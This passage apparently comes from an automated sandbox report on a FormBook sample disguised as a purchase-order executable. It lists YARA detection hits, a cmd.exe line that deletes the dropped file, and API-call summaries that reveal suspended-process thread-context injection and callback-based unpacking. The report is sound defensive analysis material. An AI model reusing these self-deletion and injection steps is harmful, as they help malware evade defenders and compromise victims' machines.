                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Chronological Activities

                                                                        Analysis Process: cmd.exe PID: 6524 Parent PID: 6420

                                                                        General

                                                                        Start time:11:06:43
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
                                                                        Imagebase:0x870000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: conhost.exe PID: 6540 Parent PID: 6524

                                                                        General

                                                                        Start time:11:06:44
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff774ee0000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >

                                                                          Analysis Process: Purchase Order 40,7045$.exe PID: 5468 Parent PID: 5664 Purchase Order 40,7045$.exeCOMMON

                                                                          Executed Functions

                                                                          Function 013D7FB0, Relevance: 95.0, APIs: 35, Strings: 19, Instructions: 502librarymemoryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(?), ref: 013D7FD2
                                                                          • GetProcAddress.KERNEL32(00000000,RpcMgmtEpEltInqBegin), ref: 013D7FDE
                                                                          • RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 013D7FF2
                                                                          • VirtualProtect.KERNELBASE(013FB408,00001E05,00000040,?), ref: 013D803B
                                                                          • EnumTimeFormatsA.KERNEL32(013FB408,00000000,00000000), ref: 013D804A
                                                                            • Part of subcall function 013D2E50: __wsystem.LIBCMT ref: 013D2E61
                                                                            • Part of subcall function 013D2E50: _wprintf.LIBCMT ref: 013D2E7C
                                                                            • Part of subcall function 013D2E50: _wprintf.LIBCMT ref: 013D2E9F
                                                                            • Part of subcall function 013D2E50: _wprintf.LIBCMT ref: 013D2EC3
                                                                            • Part of subcall function 013D4490: __wsystem.LIBCMT ref: 013D449D
                                                                            • Part of subcall function 013D4490: _wprintf.LIBCMT ref: 013D44B5
                                                                            • Part of subcall function 013D4490: _wprintf.LIBCMT ref: 013D44D7
                                                                            • Part of subcall function 013D4490: _wprintf.LIBCMT ref: 013D44F9
                                                                            • Part of subcall function 013D5B00: __wsystem.LIBCMT ref: 013D5B0E
                                                                            • Part of subcall function 013D5B00: _wprintf.LIBCMT ref: 013D5B26
                                                                            • Part of subcall function 013D5B00: _wprintf.LIBCMT ref: 013D5B48
                                                                            • Part of subcall function 013D5B00: _wprintf.LIBCMT ref: 013D5B69
                                                                            • Part of subcall function 013D7080: __wsystem.LIBCMT ref: 013D708D
                                                                            • Part of subcall function 013D7080: _wprintf.LIBCMT ref: 013D70A5
                                                                            • Part of subcall function 013D7080: _wprintf.LIBCMT ref: 013D70C7
                                                                            • Part of subcall function 013D7080: _wprintf.LIBCMT ref: 013D70E9
                                                                            • Part of subcall function 013D7080: _wprintf.LIBCMT ref: 013D70FD
                                                                            • Part of subcall function 013D7080: _wprintf.LIBCMT ref: 013D7111
                                                                            • Part of subcall function 013D7080: _wprintf.LIBCMT ref: 013D7125
                                                                          • __wsystem.LIBCMT ref: 013D8056
                                                                          • _wprintf.LIBCMT ref: 013D806A
                                                                          • _wprintf.LIBCMT ref: 013D807E
                                                                          • _wscanf.LIBCMT ref: 013D808C
                                                                          • _wprintf.LIBCMT ref: 013D80A0
                                                                          • _wscanf.LIBCMT ref: 013D80AE
                                                                          • _wprintf.LIBCMT ref: 013D80C2
                                                                          • _wscanf.LIBCMT ref: 013D80D0
                                                                          • __wsystem.LIBCMT ref: 013D8122
                                                                          • _wprintf.LIBCMT ref: 013D8136
                                                                          • _wprintf.LIBCMT ref: 013D814A
                                                                          • _wprintf.LIBCMT ref: 013D815E
                                                                          • _wprintf.LIBCMT ref: 013D8172
                                                                          • _wscanf.LIBCMT ref: 013D8180
                                                                          • _wprintf.LIBCMT ref: 013D8194
                                                                          • _wscanf.LIBCMT ref: 013D81A2
                                                                          • _wprintf.LIBCMT ref: 013D81B6
                                                                          • _wscanf.LIBCMT ref: 013D81C4
                                                                          • _wprintf.LIBCMT ref: 013D821C
                                                                          • _wprintf.LIBCMT ref: 013D8232
                                                                          • _wprintf.LIBCMT ref: 013D8248
                                                                          • _wprintf.LIBCMT ref: 013D825E
                                                                          • _wprintf.LIBCMT ref: 013D8274
                                                                          • __wsystem.LIBCMT ref: 013D82A1
                                                                          • _wprintf.LIBCMT ref: 013D82B5
                                                                          • _wprintf.LIBCMT ref: 013D82C9
                                                                          • _wprintf.LIBCMT ref: 013D82DD
                                                                          • _wprintf.LIBCMT ref: 013D82F1
                                                                          • _wprintf.LIBCMT ref: 013D8310
                                                                          • _wprintf.LIBCMT ref: 013D832E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$_wscanf$AddressBeginEnumFormatsLibraryLoadMgmtProcProtectTimeVirtual
                                                                          • String ID: ------------------------------------------------------------------$DAY: $Enter Full Name: $Enter Sex: $MONTH: $PLEASE ENTER CORRECT DATE OF BIRTH ACCORDING TO GREGORIAN CALENDAR$REGISTRY DETAILS$RpcMgmtEpEltInqBegin$Rpcr$THE ENTRY YOU MADE WAS WRONG.....$THE PROGRAM RESTARTS IN %d SECONDS$WRONG ENTRY$YEAR: $cls$just enter your date of birth$ll$press any key to continue.....$records.txt$t4.d
                                                                          • API String ID: 4102488321-1214783446
                                                                          • Opcode ID: 57629a4676ea15b0848c604f10f78af224643807b75fd993b1fe78d1359a3fa2
                                                                          • Instruction ID: e82e034fee2576444b27899e0658d6b8967aa15d16aa40bd3055afad5a23f2f7
                                                                          • Opcode Fuzzy Hash: 57629a4676ea15b0848c604f10f78af224643807b75fd993b1fe78d1359a3fa2
                                                                          • Instruction Fuzzy Hash: 00F124B7E00249AFDF20E7ADEC82E7E7779EB1632CF41094DE500A2746E774A8448761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D7F74, Relevance: 96.6, APIs: 35, Strings: 20, Instructions: 300librarymemoryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$_wscanf$__wsystem$AddressBeginEnumFormatsLibraryLoadMgmtProcProtectTimeVirtual
                                                                          • String ID: ------------------------------------------------------------------$DAY: $Enter Full Name: $Enter Sex: $MONTH: $PLEASE ENTER CORRECT DATE OF BIRTH ACCORDING TO GREGORIAN CALENDAR$REGISTRY DETAILS$RpcMgmtEpEltInqBegin$Rpcr$THE ENTRY YOU MADE WAS WRONG.....$THE PROGRAM RESTARTS IN %d SECONDS$WRONG ENTRY$YEAR: $cls$just enter your date of birth$ll$ll$press any key to continue.....$records.txt$t4.d
                                                                          • API String ID: 2572909965-3132425968
                                                                          • Opcode ID: d35e00e71e3246f69296c0f28e35701500423f0938399a8f58abb6438e1969ce
                                                                          • Instruction ID: a0575e95a194c3a2a95e19f87f93c50791b4fc0514c347c2540b833a13c0337f
                                                                          • Opcode Fuzzy Hash: d35e00e71e3246f69296c0f28e35701500423f0938399a8f58abb6438e1969ce
                                                                          • Instruction Fuzzy Hash: 9FA16CB7D40346AFDB20BBAEFC06F5DB768EB1672CF02065DE21066759E7B055088721
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D98C3, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 013D98CA
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 013D98D4
                                                                          • int.LIBCPMT ref: 013D98EB
                                                                            • Part of subcall function 013D8FA5: std::_Lockit::_Lockit.LIBCPMT ref: 013D8FB8
                                                                          • std::locale::_Getfacet.LIBCPMT ref: 013D98F4
                                                                          • ctype.LIBCPMT ref: 013D990E
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 013D9922
                                                                          • __CxxThrowException@8.LIBCMT ref: 013D9930
                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 013D9940
                                                                          • std::locale::facet::_Facet_Register.LIBCPMT ref: 013D9946
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_
                                                                          • String ID: bad cast
                                                                          • API String ID: 2043575007-3145022300
                                                                          • Opcode ID: c9f1659584fe5dcfad92de0ac1979cbae18729a7d5f4bf74299bef721bd2e1ad
                                                                          • Instruction ID: c14ba7fee32f7d48d295229290efc21011ed5469300428bb05d2e801f0840118
                                                                          • Opcode Fuzzy Hash: c9f1659584fe5dcfad92de0ac1979cbae18729a7d5f4bf74299bef721bd2e1ad
                                                                          • Instruction Fuzzy Hash: BF015E3790021B9BCF06EBE8E944AED7279ABA462CF110108E2156B1D0DF7499058751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013FCB19, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 289fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013FCD4E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: D$f16cf4c819e742c5a2199f52f43c0a31
                                                                          • API String ID: 823142352-1268323654
                                                                          • Opcode ID: b5144dede0a5c2693a5d760082e9430a1bc7afb5598599770376db61548b7c8b
                                                                          • Instruction ID: 81a11aaea80e8ae2cd24163065f49b1a1f704bebd471be7708175ab5542c0bbf
                                                                          • Opcode Fuzzy Hash: b5144dede0a5c2693a5d760082e9430a1bc7afb5598599770376db61548b7c8b
                                                                          • Instruction Fuzzy Hash: 25D12530D4438CEEEF21CBE8DC45BEDBBB4AF14715F10409AE648BA291D7B50A85DB25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013FB9AF, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 013FBA75
                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,013FC4C8,81AF6D4E,013FC00B), ref: 013FBA9F
                                                                          • ReadFile.KERNELBASE(00000000,00000000,013FC00B,?,00000000,?,?,?,?,?,?,?,?,?,013FC4C8,81AF6D4E), ref: 013FBAB6
                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,013FC4C8,81AF6D4E,013FC00B), ref: 013FBAD8
                                                                          • FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,013FC4C8), ref: 013FBB4A
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 013FBB55
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,013FC4C8,81AF6D4E,013FC00B,00000000), ref: 013FBBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                          • String ID:
                                                                          • API String ID: 656311269-0
                                                                          • Opcode ID: 93b28486482b233a9fc0f257d5a4c66314b912bb1555ae1b256415724baca865
                                                                          • Instruction ID: 3e3285616d52d7e8da1ac152c9c13dd580441574d96f39bb4ef1d9fe97f449ca
                                                                          • Opcode Fuzzy Hash: 93b28486482b233a9fc0f257d5a4c66314b912bb1555ae1b256415724baca865
                                                                          • Instruction Fuzzy Hash: A8516DB1E4031DBADB209BA8CD84FAEFBB9AF14614F144469F611F7288E67499018B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013FB414, Relevance: 6.3, APIs: 4, Instructions: 335threadprocessinjectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 013FB53E
                                                                          • GetThreadContext.KERNELBASE(?,?), ref: 013FB55D
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013FB57D
                                                                          • SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 013FB73A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ContextProcessThread$CreateMemoryRead
                                                                          • String ID:
                                                                          • API String ID: 3262821800-0
                                                                          • Opcode ID: 3eb7ab554e1e5e0187ac4a2d43de8cf8b3ae19ede1c1b5aa68d283930d97de31
                                                                          • Instruction ID: 856d6b1b2af43c39f45ff226d766979eaea4c421924638c530086f21714958c1
                                                                          • Opcode Fuzzy Hash: 3eb7ab554e1e5e0187ac4a2d43de8cf8b3ae19ede1c1b5aa68d283930d97de31
                                                                          • Instruction Fuzzy Hash: C3C15BB1900209ABEF11DFA8CD84FEEFBB9FF04308F184169E614B6194D775AA45CB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E64DA, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,013DC6A5), ref: 013E64DD
                                                                          • __malloc_crt.LIBCMT ref: 013E650C
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 013E6519
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                          • String ID:
                                                                          • API String ID: 237123855-0
                                                                          • Opcode ID: 0b3f7bfa7d676bd8c1094c4c7a7b98fdd6ddfb60b0951df4831956daf2c36ce7
                                                                          • Instruction ID: 04971e41b090bf98ed4841ecfdcd21341bdf64edf9b6fd9a402d098a88459b2c
                                                                          • Opcode Fuzzy Hash: 0b3f7bfa7d676bd8c1094c4c7a7b98fdd6ddfb60b0951df4831956daf2c36ce7
                                                                          • Instruction Fuzzy Hash: 63F0E9B7500231EACB31773CBC4E86B2AADDAE12287064155F501D31C6FA108A4586A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D9DA3, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::ios_base::_Init.LIBCPMT ref: 013D9DAB
                                                                            • Part of subcall function 013D9C46: __EH_prolog3.LIBCMT ref: 013D9C4D
                                                                            • Part of subcall function 013D9C46: std::ios_base::getloc.LIBCPMT ref: 013D9C56
                                                                          • std::ios_base::_Addstd.LIBCPMT ref: 013D9DE3
                                                                            • Part of subcall function 013D25B0: __CxxThrowException@8.LIBCMT ref: 013D25D9
                                                                            • Part of subcall function 013D25B0: std::exception::exception.LIBCMT ref: 013D2600
                                                                            • Part of subcall function 013D25B0: __CxxThrowException@8.LIBCMT ref: 013D261F
                                                                            • Part of subcall function 013D25B0: std::exception::exception.LIBCMT ref: 013D2641
                                                                            • Part of subcall function 013D25B0: __CxxThrowException@8.LIBCMT ref: 013D2660
                                                                            • Part of subcall function 013D25B0: std::exception::exception.LIBCMT ref: 013D267D
                                                                            • Part of subcall function 013D25B0: __CxxThrowException@8.LIBCMT ref: 013D269C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Exception@8Throw$std::exception::exception$std::ios_base::_$AddstdH_prolog3Initstd::ios_base::getloc
                                                                          • String ID:
                                                                          • API String ID: 1025213429-0
                                                                          • Opcode ID: 79c2e9838dc27657351b36c3d568aa0fe8718f2db29ba78238f02fd030d78d3d
                                                                          • Instruction ID: 7de174f48a88fe764904230c73f64c16239208ad251c315d86439ddbd56cec1f
                                                                          • Opcode Fuzzy Hash: 79c2e9838dc27657351b36c3d568aa0fe8718f2db29ba78238f02fd030d78d3d
                                                                          • Instruction Fuzzy Hash: FEF0E532200754ABFB35AB2DA444B4B77D8AB5022CF00480EE0864B980CAB5F4408794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D9C46, Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 013D9C4D
                                                                          • std::ios_base::getloc.LIBCPMT ref: 013D9C56
                                                                            • Part of subcall function 013D90DC: std::locale::facet::_Incref.LIBCPMT ref: 013D90F1
                                                                            • Part of subcall function 013D98C3: __EH_prolog3.LIBCMT ref: 013D98CA
                                                                            • Part of subcall function 013D98C3: std::_Lockit::_Lockit.LIBCPMT ref: 013D98D4
                                                                            • Part of subcall function 013D98C3: int.LIBCPMT ref: 013D98EB
                                                                            • Part of subcall function 013D98C3: std::locale::_Getfacet.LIBCPMT ref: 013D98F4
                                                                            • Part of subcall function 013D9066: std::locale::facet::_Decref.LIBCPMT ref: 013D906C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: H_prolog3std::locale::facet::_$DecrefGetfacetIncrefLockitLockit::_std::_std::ios_base::getlocstd::locale::_
                                                                          • String ID:
                                                                          • API String ID: 4087297709-0
                                                                          • Opcode ID: 2a2b5ca9922e68ae07c589ca74d17014ec6de754a0c70c613bee260737b011bb
                                                                          • Instruction ID: 8674070af2b7a691464616634dc30fd3d7e626e2f87ef69fc42bf3d94d31952b
                                                                          • Opcode Fuzzy Hash: 2a2b5ca9922e68ae07c589ca74d17014ec6de754a0c70c613bee260737b011bb
                                                                          • Instruction Fuzzy Hash: 25E04F76900226DBCF14FBF8E808B9D77B4AF34228F100515E551A72D0CF349A048754
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E70E3, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013DF109,?,?,00000000,00000000,00000000,?,013E3511,00000001,00000214,?,013DF0BF), ref: 013E7126
                                                                            • Part of subcall function 013E04FA: __getptd_noexit.LIBCMT ref: 013E04FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: AllocateHeap__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 328603210-0
                                                                          • Opcode ID: f1e71669ea2987675bb47b0c59f9860a7a40e937899e04e61ccb1a208942811b
                                                                          • Instruction ID: f89fa6e71509332b3f4685eb5b0197ae8b55374342fa16846bb0324bb9f93e69
                                                                          • Opcode Fuzzy Hash: f1e71669ea2987675bb47b0c59f9860a7a40e937899e04e61ccb1a208942811b
                                                                          • Instruction Fuzzy Hash: 7201B1313013359BEB3A8E69DC1CF6737DAAB81768F054529E9158B2D0EB70D8008780
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D9E3D, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 431132790-0
                                                                          • Opcode ID: bc4324c497a65a222f13e8d51494d865c3d9f73dc0faa3b590dc5ebaa7854ada
                                                                          • Instruction ID: eca20a5fc6fbe5473682af9a9fed3573b50d61980c1ffe7ffb8946ce43aa4dff
                                                                          • Opcode Fuzzy Hash: bc4324c497a65a222f13e8d51494d865c3d9f73dc0faa3b590dc5ebaa7854ada
                                                                          • Instruction Fuzzy Hash: AFF0FE79600329CFCB55DF58C404A5DBBF0FF58708F11881DE5859B390D7B19A54CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E33AF, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000,013EC38A,013FD610,00000314,00000000,?,?,?,?,?,013E5F6F,013FD610,Microsoft Visual C++ Runtime Library,00012010), ref: 013E33B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: 237d3ae8c130dac3e8979b96d87e5b33da057b6ef50027de2d39c2e4e36f65a3
                                                                          • Instruction ID: c18245e43aad1d5b24b9b401eb77e8ab12664977025aee07e9f965dd93b529c7
                                                                          • Opcode Fuzzy Hash: 237d3ae8c130dac3e8979b96d87e5b33da057b6ef50027de2d39c2e4e36f65a3
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 013E8648, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
